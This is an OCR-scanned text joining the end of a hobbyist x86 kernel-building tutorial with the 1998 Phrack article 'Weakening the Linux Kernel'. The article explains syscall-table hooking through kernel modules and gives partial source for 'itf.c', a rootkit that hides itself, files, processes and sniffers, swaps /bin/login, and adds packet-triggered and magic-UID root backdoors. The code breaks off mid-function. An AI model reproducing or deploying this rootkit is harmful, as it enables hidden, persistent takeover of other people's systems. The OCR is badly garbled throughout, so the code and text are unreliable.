31,—- 12 Page Table Base Address 
AM. =z 29 Unused (Free bits) 

8 0 

7 Page Size Bit 

6 0 

5 Accessed Bit 

4 Page Cache Disable Bit 
3 Page Write Through Bit 
2 User/Supervisor Bit 

1 Read/Write Bit 

0 Page Present Bit 


The Page Table Base address is an index to the page table which contains 
information about this memory location. When a memory location is accessed 

the most significant 10 bits are used to reference one of the 1024 entries in 
the page directory. This entry will point to a page table which has a physical 
memory address equal to the Page Table Base Address. This table is then 
referenced to one of its 1024 entries by the 21 - 12 bits of the memory 
address. 


[The Page Size Bit tells whether each page is equal to (Bit = 0) 4kb or 
(Bit = 1) 4MB. 

The accessed bit is used to show whether the page has ever been accessed. Once 
set to 1, the OS must reset it to 0. This is used for virtual paging. 


he Page Cache Disable Bit and Page Write Bit are not currently used by me, so 
I will leave its definition as an exercise to the reader (enjoy). 


[The User/Supervisor Bit specifies whether access to the page table is 
restricted to access by tasks with privilege level 0,1,2 or 3. If the bit is 
set to 0 then only tasks with level 0, 1, or 2 can access this page table. If 
the bit is set to 1, then tasks with level 0, 1, 2, or 3 can access this page 
t 


The Read/Write bit is used to specify whether a user level task can write to 
this page table. If it is set to 0 then it is read only to "User" tasks. If 
it is set to 1 then it is read/writable by all tasks. 


Finally, the Present Bit is used to specify whether the page table is present 
in memory. If this is set to 1 then it is. 


Once the page directory is referenced, the offset into the page table is 


selected. Using the next 10 bits of the memory reference. Each page table 
has 1024 entries with each entry having the following structure: 
31 - 12 Page Base Address 

LL <=-9 Unused (Free bits) 

8 - 7 0 

6 Dirty Bit 

2) Accessed Bit 

4 Page Cache Disable Bit 

3 Page Write Through Bit 

2 User/Supervisor Bit 

ai Read/Write Bit 

0 Page Present Bit 


he Page Base Address points to the upper 20 bits in physical memory where 
the memory access points to. The lower 12 bits are taken from the original 
linear memory access. 


[The Dirty, Accessed, Page Cache, and Page Write Through Bits are all used for 
virtual memory and other areas which I have not yet been concerned yet. So 
they are relegated to the reader (for now). 
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The remaining three bits behave just as in the page directory except that 
they apply to the physical memory page as opposed to a page table. All 
kernel pages are set to have Supervisor, Read/Write, and Page Present bits 
set. User pages do not have the supervisor bits set. 


[The code in kinit_page creates the page directory in the first of the three 


physical pages that it set aside. The next page is used to create a low (user) 
memory area of 4MB (One page table of 1024 entries points to 1024 4kb pages, 
Thus 4MB). The third page is used to point to high (OS) memory. 


The kinit_page function sets all of the low page memory equal to physical 
memory. This means that there is a one to one correlation for the first 4MB 
of memory to paged memory. kinit_page then maps in ten pages starting at 
70000h linear into 0x80000000. Entry number 0 of the page directory is then 
set to point to the low page table. Entry number 512 is set to point to the 
high page table. 


Finally the kinit_page function places the address of the page directory 

into the cr3 register. This tells the processor where to look for the page 
tables. Finally, cr0O has its paging bit turned on which informs the processor 
that memory accesses should go through the page table rather than just being 
direct physical memory accesses. 


After this the _start function is returned into and k_start() has been set to 
0x80000080 which points to the _start() function in the main kernel. 
_start in the boot code calls this function which starts the real kernel off. 


----[ Chapter 3 The Kernel 


The kernel is where all of the fun begins. Unfortunately, this is the place 
that needs the most work. However, there is enough here to demonstrate the 
beginnings of what needs to be done to build a viable kernel for your own work. 


The kernel boot loader created the kernel page table and then jumped into the 
kernel at _start(); _start() then sets up the console, clears it, and displays 
t 
m 


he message "Main kernel loaded.". Once this is done it runs the memory 
anager initialization routine /kinit_page()’. 


The memory manager initialization routine begins by initializing a structure 


called the PMAT. The PMAT is a giant bit field (2048 bytes), where each bit 
represents one page of physical memory. If a bit is set to 1, the 
corresponding page of memory is considered allocated. If the bit is set to 0 


then it is considered unallocated. Once this array is initialized the memory 
management code sets aside the chunks of physical memory which are already in 


use. This include the system BUS memory areas, as well as the location of the 
kernel itself in physical memory. Once this is completed the memory manager 
returns to the _start() function so that it can proceed with kernel 
initialization. 


The _start() function then calls a temporary function which I am using now to 
allocate memory which is use by the user program loading in by the first 
stage floppy loader. This will go away after I add the loading of processes 
off of disk during run time. This function sets aside the physical memory 
which is located at 20000h linear. 


Now that the basic memory system is set up the _start() function calls the 
kinit_task() function. kinit_task() sets up the kernel task so that it can 
run as a task rather than as a the only process on the system. 


kinit_task() is really a shell function which calls two other functions: 
kinit_gdt() and kinit_ktask(); kinit_gdt() initializes a new kernel GDT which 
is to be used by the kernel rather than the previous temporary one which was 
set up by the second stage floppy boot loader. Once the new location for the 
gdt is mapped into memory several selectors are added to it. Kernel Code and 
Data selectors are added. Also, User Code and Data selectors are added. Once 
these selectors are put into place, the new gdt is placed in the gdt register 
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on the processor so that it can be used. 


kinit_task() now calls the kinit_ktask() function. This task creates a task 
which the kernel code will be executed as. The first thing this function does 
is to clear out the kernels task list. This list contains a list of tasks 


on the system. Next a 4k page is allocated for the kernel task segment. The 
current executing task is then set to the kernel task. Next the task segment 
is added to the GDT. This task segment has the following structure and is 
filled out for the kernel with the following values by me. In fact all tasks 
will start out with these settings. 


struct TSS { 


ushort link; // set to 0 

ushort unused0; 

ulong esp0O; // set to the end of the task segment page 

ushort ss0; // set to SEL_KDATA (Kernel Data segment) 

ushort unusedl; 

ulong espl; // set to 0 

ushort ssl; // set to 0 

ushort unused2; 

ulong esp2; // set to 0 

ushort ss2; // set to 0 

ushort unused3; 

ulong cr3; // set to the physical address of this tasks page 
// tables 

ulong eip; // set to the entry point to this tasks code 

ulong eflags; // set to 0x4202 

ulong eax, ecx, edx, ebx, esp, ebp, esi, edi; // set to garbage values 

ushort es; // set to SEL_KDATA (Kernel data segment) 

ushort unused4; 

ushort cs; // set to SEL_KCODE (Kernel code segment) 

ushort unused5; 

ushort ss; // set to SEL_KDATA 

ushort unused6; 

ushort ds; // set to SEL_KDATA 

ushort unused7; 

ushort fs; // set to SEL _KDATA 

ushort unused8; 

ushort gs; // set to SEL _KDATA 

ushort unused9; 

ushort ldt; // set to 0 

ushort unusedl0; 

ushort debugtrap; // set to 0 

ushort iomapbase; // set to 0 


}; 


The link field is used by the processor when an interrupt is called. The 
processor places a pointer to the task segment which was running prior to the 
interrupt. This is useful for determining access rights based on the calling 
process. 


The espx and ssx parameters are used to store a pointer to a stack which will 
be used when a task with a lower privilege level tries to access a high level 
privilege area. 


The cr3 parameter is used to store a pointer to the physical address of this 
tasks page table. Whenever this task is switched to, the processor will load 
the value stored in cr3 into the cr3 register. This means that each task can 
have a unique set of page tables and mappings. 


Th ax, ebx, etc.. registers are all set to a garbage value as they are 
uninitialized and will only gain values once they are used. When the processor 
switches to this task these parameters will be loaded into their respectiv 
processor registers. 


The cs, es, ss, ds, fs, and gs parameters are all set to meaningful values 
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which will be loaded into their respective processor registers when this 
task is switched to. 


As I am not using a local descriptor I set this parameter to 0 along with the 
debugtrap and iomapbase parameters. 


As I have mentioned every time a task is switched to the processor will load 
all of the parameters from the task segment into their respective registers. 
Likewise, when a task is switched out of, all of the registers will be stored 
in their respective parameters. This allows tasks to be suspended and to 
restart with the state they left off at. 


Switching tasks will be discussed later when the point in the kernel where this 
takes place at is reached. 


Once this task state segment is created it is necessary to create an entry in 
the GDT which points to this task segment. The format of this 64 bit entry is 
as follows: 


63 - 56 Fourth Byte of Base Address 
55 Granularity Bit 

54 - 53 0 

52 Available for use (free bit) 
51 - 48 Upper Nibble of Size 

47 Present in Memory Bit 

AiG: 24.5 Descriptor Privilege Level 
44 System Built 

43 16/32 Bit 

42 0 

41 Busy Bit 

40 1 

39° =. 32 Third Byte of Base Address 
31 - 24 Second Byte of Base Address 
23) S16 First Byte of Base Address 
LS: = *8 Second Byte of Segment Size 
7 -— 0 First Byte of Segment Size 


As you have probably noticed, this structure is very similar to the code 
segment descriptor. The differences are the 16/32 bit, and the Busy Bit. 


The 16/32 Bit specifies whether the task state segment is 16 bit or 32 bit. 

We will only be using the 32 Bit task segment (Bit = 1). The 16 bit task state 
s 

t 


egment was used for the 286 and was replaced by a 32 bit task state segment on 
he 386+ processors. 


The busy bit specifies whether the task is currently busy. 


Once the kernel task is allocated, a new kernel stack is allocated and made 
active. This allows the stack to be in a known and mapped in location which 
uses the memory manager of the kernel. 


The user tasks is then created in a similar fashion as the kernel task. In 
this current implementation the user task is located at 0x20000. Its stack 

is located at 0x2107c. Currently, this user task operates with OS level 
privilege. I encountered some problems when changing its selectors to user 
entries in the GDT. As soon as I fix this problem I will post a fix on my web 
site. After the user task is created it is added to the task queue to be 
switched to once the scheduler starts. 


Now that the kernel task and a user task (though running with kernel privilege 


level) have been created it is necessary to set up the interrupt tables. This 
is done by a call to the kinit_idt() function. 


kinit_idt() starts by setting all of the interrupts to point to a null 
interrupt function. This means that for most interrupts a simple return 
occurs. However, interrupt handlers for the timer as well as for one system 
call. Also, interrupts are set up to handle the various exceptions. Once 
this table is filled out the interrupt descriptor table (IDT) is loaded into 
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the idt register. The interrupts are then enabled to allow them to be called. 


he timer interrupt handler is a simple function which calls a task switch 
every time the hardware timer fires. 


The system call (interrupt 22h) is called, the handler will print out on the 
console the string which is pointed to be th ax register. 


he exception handling routine will dump the task registers and then hang the 
system. The jump.S file in JeffOS/kernel/ contains the assembly wrappers which 
are called when an interrupt occurs. These wrapper functions then call the C 
handler functions. 


Now that the IDT is set up and interrupts are occurring task switches can occur. 


These occur when the swtch() function is called in the task.c file. The 
swtch() function locates the next task in its queue and does a call to the 
selector address of the new task. This causes the processor to look up the 


selector and switch to the new task. 


You now have a very simple multi-tasking kernel. 


-—---[ Chapter 4 User level libraries 


The user level libraries are fairly simplistic. 


There are two files in this directory. The first is the crt0O.c file. 

This file contains one function which is the _start() function. This function 
makes a call to main which will be defined in user code. This stub function 
must always be linked in first as it will be jumped into by the kernel to 
begin running the process. 


The second file is the syscall.c file. [This file contains one system call 
function which is simply an interrupt 22. This interrupt calls the console 
system call. eax is passed in as a pointer to a string which is printed to 
the system console. 


Both of these source files are compiled to objects and are used during the 
linking phase of any user code. 


----[ Chapter 5 User cod 


The user code is stored in one file called test.c. This file is located in 
the /user/ directory. All this code does is call the console system call 
function provided by the library, wait a short amount of time, and call it 
again in a non-terminating loop (good thing, as I don’t handle task 
termination yet). 


The important thing to note is that when linking this user process is set to 
have a text segment of 20000h linear. Also the crt0.o and syscall.o files are 
linked in as well. crt0O.o is linked in first to insure that its _start() 
function is at 20080h so it will be jumped into by the kernel. In truth, 
_start() is the real main as opposed to the main() everyone is used to dealing 
with. 


This code is the task which is created and run alongside the kernel, as 
described in chapter 3. 


----[ Chapter 6 - Creating a disk image out of the binaries 


Once you have compiled all of the binaries and placed them into the build 
directory you will need to create two more files before continuing. These 
files are called STUFF.BIN and STUFF2.BIN. These files are simply containers 
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of empty space to cause alignment of other binaries. The floppy loader 
expects the user program to be 1k in size. If the user program is not exactly 
this size then STUFF2.BIN needs to be created and be of such a size that when 
added to USER.BIN the size is 1024 bytes. Also, the floppy boot loader 
expects the kernel boot loader to be 3.5k (3584 bytes) in size. STUFF.BIN 
needs to be made of such length that when added to the size of the BOOT.BIN 
(kernel boot loader) file the size will be 3584 bytes. In the future I will 
try to automate this process, but for now this is simply how it must be done. 
Once this is complete the shell program ’go’ must be run. This will place all 
of the binary files into one file called ’os.bin’. This file can then be 
written to disk by one of the following two methods. 


If you want to do it from linux you can do the following command: 
dd if=os.bin of=/dev/fd0 (places os.bin directly onto the floppy disk) 


or from DOS you can obtain the rawrite command and run it and follow its 
directions. 


-—---[ Conclusion 


The kernel contained within is far from complete. However, it is a first step 
towards creating a real protected mode operating system. It is also enough to 
begin working with, or to refer to during you own work on a protected mode 
operating system. Doing this work is simply both one of the most rewarding 
things you will ever do, and one of the most frustrating. Many a night has 
been spent at the local tavern telling war stories about this stuff. But in 
the end, it has all been great fun. 


I wish you all the best of luck! 


Jeff Thompson 
jJwthomp@cu-online.com 
http://www.cu-online.com/~ jwthomp/ 
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---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 18 of 
[ Weakening the Linux Kernel 
aHae SSS [ plaguez <dube0866@eurobretagne.fr> 
[ Preambl 
The following applies to the Linux x86 2.0.x kernel series. It may also be 


accurate for previous releases, but has not been tested. 2.1.x kernels 


20 


introduced a bunch of changes, most notably in the memory management routines, 


and are not discussed here. 


Thanks to Halflife and Solar Designer for lots of neat ideas. Brought to you 


by plaguez and WSD. 


----[ User space vs. Kernel space 


Linux supports a number of architectures, however most of the code and 
discussion in this article refers to the i386 version only. 


Memory is divided into two parts: kernel space and user space. Kernel space 
is defined in the GDT, and mapped to each processes address space. User 
space is in the LDT and is local to each process. A given program can’t 
write to kernel memory even when it is mapped because it is not in the 

same ring. 


You also can not access user memory from the kernel typically. However, 
this is really easy to overcome. When w xecute a system call, one 

of the first things the kernel does is set ds and es up so that memory 
references point to the kernel data segment. It then sets up fs so that 
it points to the user data segment. If we want to use kernel memory 

in a system call, all we should have to do is push fs, then set it to ds. 
Of course, I have not actually tested this, so take it with a pound or 
two of salt :). 


Here are a few of the useful functions to use in kernel mode for transferri 
data bytes to or from user memory: 


#include <asm/segment .h> 


get_user (ptr) 
Gets the given byte, word, or long from user memory. This is a macro, 
it relies on the type of the argument to determine the number of bytes 
transfer. You then have to use typecasts wisely. 


put_user (ptr) 
This is the same as get_user(), but instead of reading, it writes data 
bytes to user memory. 


memcpy_fromfs(void *to, const void *from,unsigned long n) 
Copies n bytes from *from in user memory to *to in kernel memory. 


memcpy_tofs(void *to,const *from,unsigned long n) 
Copies n bytes from *from in kernel memory to *to in user memory. 


-—---[ System calls 


Most libc function calls rely on underlying system calls, which are the 


ng 


and 
to 
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simplest kernel functions a user program can call. These system calls are 
implemented in the kernel itself or in loadable kernel modules, which are 
little chunks of dynamically linkable kernel cod 


Like MS-DOS and many others, Linux system calls are implemented through a 
multiplexor called with a given maskable interrupt. In Linux, this interrupt 
is int 0x80. When the ’int 0x80’ instruction is executed, control is given to 
the kernel (or, more accurately, to the function _system_call()), and the 
actual demultiplexing process occurs. 


The _system_call() function works as follows: 

First, all registers are saved and the content of the %eax register is checked 
against the global system calls table, which enumerates all system calls and 
their addresses. This table can be accessed with the extern void 
*sys_call_table[] variable. A given number and memory address in this table 
corresponds to each system call. System call numbers can be found in 
/usr/include/sys/syscall.h. They are of the form SYS_systemcallname. If the 
system call is not implemented, the corresponding cell in the sys_call_table 
is 0, and an error is returned. Otherwise, the system call exists and the 
corresponding entry in the table is the memory address of the system call code. 


Here is an example of an invalid system call: 


root@plaguez kernel]# cat nol.c 
include <linux/errno.h> 
include <sys/syscall.h> 
include <errno.h> 


extern void *sys_call_table[]; 


sc() 
{ // system call number 165 doesn’t exist at this time. 
__asm__ ( 
"movl $165, %eax 
int $0x80"); 
} 
main () 
{ 
errno = -sc(); 
perror("test of invalid syscall"); 
} 
[root@plaguez kernel]# gcc nol.c 
[root@plaguez kernel]# ./a.out 
test of invalid syscall: Function not implemented 
[root@plaguez kernel] xit 


Normally, control is then transferred to the actual system call, which performs 
whatever you requested and returns. _system_call() then calls 

ret_from_sys_call() to check various stuff, and ultimately returns to user 
memory. 


----[ libc wrappers 


The int $0x80 isn’t used directly for system calls; rather, libc functions, 
which are often wrappers to interrupt 0x80, are used. 


libec is actually the user space interface to kernel functions. 


libc generally features the system calls using the _syscallX() macros, where X 
is the number of parameters for the system call. 


For example, the libc entry for write(2) would be implemented with a _syscall3 
macro, since the actual write(2) prototype requires 3 parameters. Before 
calling interrupt 0x80, the _syscallX macros are supposed to set up the stack 
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frame and the argument list required for the system call. Finally, when the 
_system_call() (which is triggered with int $0x80) returns, the _syscallX() 
macro will check for a negative return value (in %eax) and will set errno 
accordingly. 


Let’s check another example with write(2) and see how it gets preprocessed. 


root@plaguez kernel]# cat no2.c 
nclude <linux/types.h> 

nclude <linux/fs.h> 

nclude <sys/syscall.h> 

nclude <asm/unistd.h> 

nclude <sys/types.h> 

nclude <stdio.h> 

nclude <errno.h> 

nclude <fcntl.h> 

nclude <ctype.h> 


Pepe pe pe pe pe pe pe pe 


_syscall3(ssize_t,write,int,fd,const void *,buf,size_t,count); 


main() 
{ 
char *t = "this is a test.\n"; 
write(0, t, strlen(t)); 
} 
[root@plaguez kernel]# gcc -E no2.c > no2.C 
[root@plaguez kernel]# indent no2.C -kr 
indent:no2.C:3304: Warning: old style assignment ambiguity in "=- 
Assuming "= -" 


W 


[root@plaguez kernel]# tail -n 50 no2.C 


#9 "no2.c" 2 


ssize_t write(int fd, const void *buf, size_t count) 


{ 


long res; 


__asm__ __volatile("int $0x80":"=a"(__res):"0"(4), "b"((long) (fd)), 
"c"((long) (buf)), "d"((long) (count))); 

if (__res >= 0) 

return (ssize_t) __res; 
rrno = -__res; 

return -1; 
}; 
main () 
{ 

char *t = "this is a test.\n"; 

write(0, t, strlen(t)); 
} 
[root@plaguez kernel]# exit 
Note that the ’4’ in the write() function above matches the SYS_write 


definition in /usr/include/sys/syscall.h. 


----[ Writing your own system calls. 


There are a few ways to create your own system calls. For example, you could 
modify the kernel sources and append your own code. A far easier way, however, 
would be to write a loadable kernel module. 
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A loadable kernel module is nothing more than an object file containing code 
that will be dynamically linked into the kernel when it is needed. 


The main purposes of this feature are to have a small kernel, and to load a 
given driver when it is needed with the insmod(1l) command. It’s also easier 
to write a lkm than to write code in the kernel source tree. 


With lkm, adding or modifying system calls is just a matter of modifying the 
sys_call_table array, as we’ll see in the example below. 


----[ Writing a lkm 


A lkm is easily written in Cc. It contains a chunk of #defines, the body of the 
code, an initialization function called init_module(), and an unload function 
called cleanup_module(). The init_module() and cleanup_module() functions 

will be called at module loading and deleting. Also, don’t forget that 

modules are kernel code, and though they are easy to write, any programming 
mistake can have quite serious results. 


Here is a typical lkm source structure: 


define MODULE 
define _ KERNEL 


include <linux/config.h> 
ifdef MODULE 
include <linux/module.h> 
include <linux/version.h> 
else 
define MOD_INC_USE_COUN 
define MOD_DEC_USE_COUN 
endif 


x 


de 
de 


nc] 
nc] 
nclude 


inux/types.h> 
inux/fs.h> 
inux/mm.h> 
nclude inux/errno.h> 
nclude <asm/segment .h> 
nclude <sys/syscall.h> 
nclude <linux/dirent.h> 
nclude <asm/unistd.h> 
nclude <sys/types.h> 
nclude <stdio.h> 
nclude <errno.h> 
nclude <fcntl.h> 
nclude <ctype.h> 


Pep pe pe pe pe pe pe pe pe ee ee 


int errno; 
char tmp[64]; 


/* for example, we may need to use ioctl */ 
_syscall3(int, ioctl, int, d, int, request, unsigned long, arg); 


int myfunction(int parml,char *parm2) 
{ 

int i,j,k; 

JER Seigras ORY 
} 


int init _module (void) 

{ 
LR eco. Kf 
printk("\nModule loaded.\n"); 
return 0; 
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void cleanup_module (void) 
{ 
fe Ne RY 
printk("\nModule unloaded.\n") ; 


} 


Check the mandatory #defines (#define MODULE, #define __KERNEL__) and 
#includes (#include <linux/config.h> ...) 


Also note that as our lkm will be running in kernel mode, we can’t use libc 
functions, but we can use system calls with the previously discussed 
_syscallX() macros or call them directly using the pointers to functions 
located in the sys_call_table array. 


You would compile this module with ’gcc -c -O3 module.c’ and insert it into 
the kernel with ’insmod module.o’ (optimization must be turned on). 


As the title suggests, lkm can also be used to modify kernel code without 
having to rebuild it entirely. For example, you could patch the write(2) 
system call to hide portions of a given file. Seems like a good place for 
backdoors, also: what would you do if you couldn’t trust your own kernel? 


-—---[ Kernel and system calls backdoors 


The main idea behind this is pretty simple. We’1ll redirect those damn system 
calls to our own system calls in a lkm, which will enable us to force the 
kernel to react as we want it to. For example, we could hide a sniffer by 
patching the IOCTL system call and masking the PROMISC bit. Lame but 
efficient. 


To modify a given system call, just add the definition of the extern void 
*sys_call_table[] in your lkm, and have the init_module() function modify the 
corresponding entry in the sys_call_table to point to your own code. The 
modified call can then do whatever you wish it to, meaning that as all user 
programs rely on those kernel calls, you’1ll have entire control of the system. 


This point raises the fact that it can become very difficult to prevent 
intruders from staying in the system when they’ve broken into it. Prevention 
is still the best way to security, and hardening the Linux kernel is needed on 
sensitive boxes. 


----[ A few programming tricks 


- Calling system calls within a lkm is pretty easy as long as you pass user 
space arguments to the given system call. If you need to pass kernel space 
arguments, you need to be sure to modify the fs register, or else 

everything will fall on its face. It is just a matter of storing the 

system call function in a "pointer to function" variable, and then using this 
variable. For example: 


define MODULE 
define __ KERNEL 


include <linux/config.h> 
#ifdef MODULE 
include <linux/module.h> 
include <linux/version.h> 
else 
define MOD_INC_USE_COUNT 
define MOD_DEC_USE_ 
endif 
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i linux/types.h> 
i linux/fs.h> 
i linux/mm.h> 
i de <linux/errno.h> 
include <asm/segment.h> 
include <sys/syscall.h> 


Q 
0) 
ANN A 


include <unistd.h> 
include <linux/unistd.h> 


int errno; 


/* pointer to the old setreuid system call */ 
int (*o_setreuid) (uid_t, uid_t); 

/* the system calls vectors table */ 

extern void *sys_call_table[]; 


int n_setreuid(uid_t ruid, uid_t euid) 

{ 
printk("uid Si trying to seteuid to euid=%i", current->uid, euid); 
return (*o_setreuid) (ruid, euid); 


int init _module (void) 


o_setreuid = sys_call_table[SYS_setreuid]; 
sys_call_table[SYS_setreuid] = (void *) n_setreuid; 
printk ("swatch loaded.\n"); 

return 0; 


} 


void cleanup_module (void) 

{ 
sys_call_table[SYS_setreuid] = o_setreuid; 
printk("\swatch unloaded.\n"); 


} 


—- Hiding a module can be done in several ways. As Runar Jensen showed in 
Bugtraq, you could strip /proc/modules on the fly, when a program tries to 
read it. Unfortunately, this is somewhat difficult to implement and, as it 
turns out, this is not a good solution since doing a 

‘dd if=/proc/modules bs=1’ would show the module. We need to find another 
solution. Solar Designer (and other nameless individuals) have a solution. 
Since the module info list is not exported from the kernel, there is no direct 
way to access it, except that this module info structure is used in 
sys_init_module(), which calls our init_module()! Providing that gcc does not 
fuck up the registers befor ntering our init_module(), it is possible to get 
the register previously used for struct module *mp and then to get the address 
of one of the items of this structure (which is a circular list btw). So, our 
init_module() function will include something like that at its beginning: 


int init_module() 
{ 
register struct module *mp asm("%ebx") ; // or whatever register it is in 
* (char*) mp->name=0; 
mp->size=0; 
mp->ref=0; 


} 


Since the kernel does not show modules with no name and no references (=kernel 
modules), our one won’t be shown in /proc/modules. 


----[ A practical example 
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Here is itf.c. The goal of this program is to demonstrate kernel backdooring 
techniques using system call redirection. Once installed, it is very hard to 
spot. 


Its features include: 


—- stealth functions: once insmod’ed, itf will modify struct module *mp and 
get_kernel_symbols(2) so it won’t appear in /proc/modules or ksyms’ outputs. 
Also, the module cannot be unloaded. 


—- sniffer hidder: itf will backdoor ioct1(2) so that the PROMISC flag will be 
hidden. Note that you’1ll need to place the sniffer BEFORE insmod’ing itf.o, 
because itf will trap a change in the PROMISC flag and will then stop hidding 
it (otherwise you’d just have to do a ifconfig ethO +promisc and you’d spot 
the module...). 


-— file hidder: itf will also patch the getdents(2) system calls, thus hidding 
files containing a certain word in their filename. 


— process hidder: using the same technic as described above, itf will hide 
/procs/PD directories using argv entries. Any process named with the magic 
name will be hidden from the procfs tree. 


xecve redirection: this implements Halflife’s idea discussed in P51. 
If a given program (notably /bin/login) is execve’d, itf will execve 


another program instead. It uses tricks to overcome Linux memory managment 
limitations: brk(2) is used to increase the calling program’s data segment 
size, thus allowing us to allocate user memory while in kernel mode (remember 


that most system calls wait for arguments in user memory, not kernel mem). 


—- socket recvfrom() backdoor: when a packet matching a given size and a given 
string is received, a non-interactive program will be executed. Typicall use 
is a shell script (which will be hidden using the magic name) that opens 
another port and waits there for shell commands. 


— setuid() trojan: like Halflife’s stuff. When a setuid() syscall with uid == 
magic number is done, the calling process will get uid = euid = gid = 0 


<++> lkm_trojan.c 


/* 
eat ec: V0.8 

* Linux Integrated Trojan Facility 

* (c) plaguez 1997 dube0866@eurobretagne.fr 

* This is mostly not fully tested code. Use at your own risks. 

* 

* 

* compile with: 

gcc -c —-0O3 -fomit-frame-pointer itf.c 

* Then: 

o insmod itf 

* 

* 

* Thanks to Halflife and Solar Designer for their help/ideas. 

* 

* Greets to: wO0Ow00, GRP, #phrack, #innuendo, K2, YmanZ, Zemial. 
* 

* 

* 


/ 


define MODULE 
define _ KERNEL 


include <linux/config.h> 
include <linux/module.h> 
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include <linux/version.h> 


linux/types.h> 
linux/fs.h> 
linux/mm.h> 
de <linux/errno.h> 
nclude <asm/segment .h> 
nclude <asm/pgtable.h> 
nclude <sys/syscall.h> 
nclude <linux/dirent.h> 
nclude <asm/unistd.h> 
nclude <sys/types.h> 
] <sys/socket.h> 
nclude <sys/socketcall.h> 
de <linux/netdevice.h> 
inux/if.h> 
inux/if_arp.h> 
inux/if_ether.h> 
inux/proc_fs.h> 
stdio.h> 
nclude <errno.h> 
nclude <fcntl.h> 
nclude <ctype.h> 


Qa 
0) 
ANNA 


Pep pe pe pe pe pe pe pe pe pe pe pe ee Ee ee 
=) 
Q 
ie 
Q. 
o) 


/* Customization section 

* — RECVEXEC is the full pathname of the program to be launched when a packet 

* of size MAGICSIZE and containing the word MAGICNAME is received with recvfrom(). 

* This program can be a shell script, but must be able to handle null **argv (I’m too lazy 
* to write more than execve (RECVEXEC,NULL,NULL); :) 

* — NEWEXEC is the name of the program that is executed instead of OLDEXEC 

* when an execve() syscall occurs. 

* — MAGICUID is the numeric uid that will give you root when a call to setuid (MAGICUID) 
* is made (like Halflife’s code) 

* — files containing MAGICNAME in their full pathname will be invisible to 

* a getdents() system call. 

* — processes containing MAGICNAME in their process name will be hidden of the 

* procfs tree. 

ay 


define MAGICNAME "wO00Ow00TS!" 
define MAGICUID 31337 


GJ 


define OLDEXEC "/bin/login" 
define NEWEXEC "/ wOO0w00TS! /wO0w00TS! login" 
define RECVEXEC "/.w00w00TS!/w00w00TS!recv" 


define MAGICSIZI 


GI 


sizeof (MAGICNAME) +10 


/* old system calls vectors */ 


int (*o_getdents) (uint, struct dirent *, uint); 
ssize_t(*o_readdir) (int, void *, size_t); 

int (*o_setuid) (uid_t); 

int (*o_execve) (const char *, const char *[], const char *[]); 
int (*o_ioctl) (int, int, unsigned long); 

int (*o_get_kernel_syms) (struct kernel_sym *); 
ssize_t(*o_read) (int, void *, size_t); 

int (*o_socketcall) (int, unsigned long *); 


/* entry points to brk() and fork() syscall. */ 

static inline _syscalll(int, brk, void *, end_data_segment) ; 
static inline _syscall0O(int, fork); 

static inline _syscalll(void, exit, int, status); 


extern void *sys_call_table[]; 
extern struct proto tcp_prot; 
int errno; 


char mtroj[] = MAGICNAM 
int __NR_myexecve; 
int promisc; 


GJ 
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/* 


char *strncpy_fromfs(char *dest, 


{ 


int 


* 
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* String-oriented functions 


(from user-spac 


*/ 


char *tmp = 
int compt 


src; 
0; 


do { 


to kernel-spac 


or invert) 


const char *src, int n) 


dest [compt++] 
} 


while 


return dest; 


myatoi(char *str) 


= 0; 
1; 


int res 
int mul 
char *ptr; 


= __get_user(tmptt, 


((dest[compt - 1] 


str 4 
if (*ptr-< "0" || 

return (-1); 
res += (*ptr - '0’ 
mul *= 10; 


for (ptr 


} 


return (res); 


/* 


* process hiding functions 


*/. 


strlen(str) 


A 


'= "\0') && (compt != n)); 


HOUT) 


ptr >= str; ptr--) { 


*ptr > 


} mudd 


struct task_struct *get_task(pid_t pid) 


{ 


} 


struct task_struct *p 


do { 
if (p->pid == pid) 
return p; 
p = p->next_task; 
} 
whil (po != current); 


return NULL; 


/* the following function 


static inl 


{ 


Dt a} 
char *name; 


name = p->comm; 
1 = sizeof (p->comm) ; 
do { 
unsigned char c = 
namet+t+; 
ssi 
*buf = c; 
if ('c) 


line char *task_name(struct task_struct *p, 


current; 


comes from fs/proc/array.c */ 
char *buf) 


*name; 
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break; 

if (c == ’\\') { 
buf[1] = c; 
buf += 2; 
continue; 

} 

Lf (EG S= $\n!).-f 
buf[0] = ’\\'; 
buf[1] = ‘n’; 
buf += 2; 


continue; 
} 
buft++; 


} 

while (i); 

*buf = /\n'; 
return buf + 1; 


int invisible (pid_t pid) 


struct task_struct *task = get_task (pid); 
char *buffer; 
if (task) { 
buffer = kmalloc(200, GFP_KERNEL) ; 
memset (buffer, 0, 200); 
task_name (task, buffer); 
if (strstr(buffer, (char *) &mtroj)) { 
kfree (buffer); 
return 1; 


} 
} 


return 0; 


/* 
* New system calls 


a / 
/* 


* hide module symbols 
i. 
int n_get_kernel_syms (struct kernel_sym *table) 
{ 
struct kernel_sym *tb; 
int compt, compt2, compt3, i, done; 


compt = (*o_get_kernel_syms) (table); 

if (table != NULL) { 
tb = kmalloc(compt * sizeof(struct kernel_sym), GFP_KERNEL) ; 
if (tb == 0) { 


return compt; 


compt2 = 0; 
done = 0; 
i = 0; 
memcpy_fromfs((void *) tbh, (void *) table, compt * sizeof(struct kernel_sym) ); 
while (!done) { 
if ((tb[compt2].name) [0] == ’#’) 
1 = compt2; 
if (!strcemp(tb[compt2].name, mtroj)) { 
for (compt3 = i+ 1; (tb[compt3].name) [0] != ’#’ && compt3 < compt; compt3+t 


if (compt3 != (compt - 1)) 
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memmove((void *) &(tb[il), (void *) &(tb[compt3]), (compt - compt3) * 
izeof(struct kernel_sym) ); 
else 
compt = i; 
donet+t; 
} 
compt2++; 
if (compt2 == compt) 
donet+t; 


} 


memcpy_tofs(table, tb, compt * sizeof(struct kernel_sym)); 
kfree (tb); 
} 


return compt; 


/* 
* how it works: 
* I need to allocate user memory. To do that, I’1ll do exactly as malloc() does 
* it (changing the break value). 
* 
int my_execve (const char *filename, const char *argv[], const char *envp[]) 


{ 


long __res; 

__asm__ volatile ("int $0x80":"=a" (__res) :"0"(__NR_myexecve), "b"((long) (filename)), 
"c"((long) (argv)), "d"((long) (envp))); 

return (int) __res; 


} 


int n_execve(const char *filename, const char *argv[], const char *envp[]) 
{ 

char *test; 

int ret, tmp; 

char *truc = OLDEXEC; 

char *nouveau = NEWEXEC; 

unsigned long mmm; 


test = (char *) kmalloc(strlen(truc) + 2, GFP_KERNEL) ; 
(void) strncpy_fromfs(test, filename, strlen(truc)); 
test [strlen(truc)] = ’\0’; 


if ('strcemp(test, truc)) { 
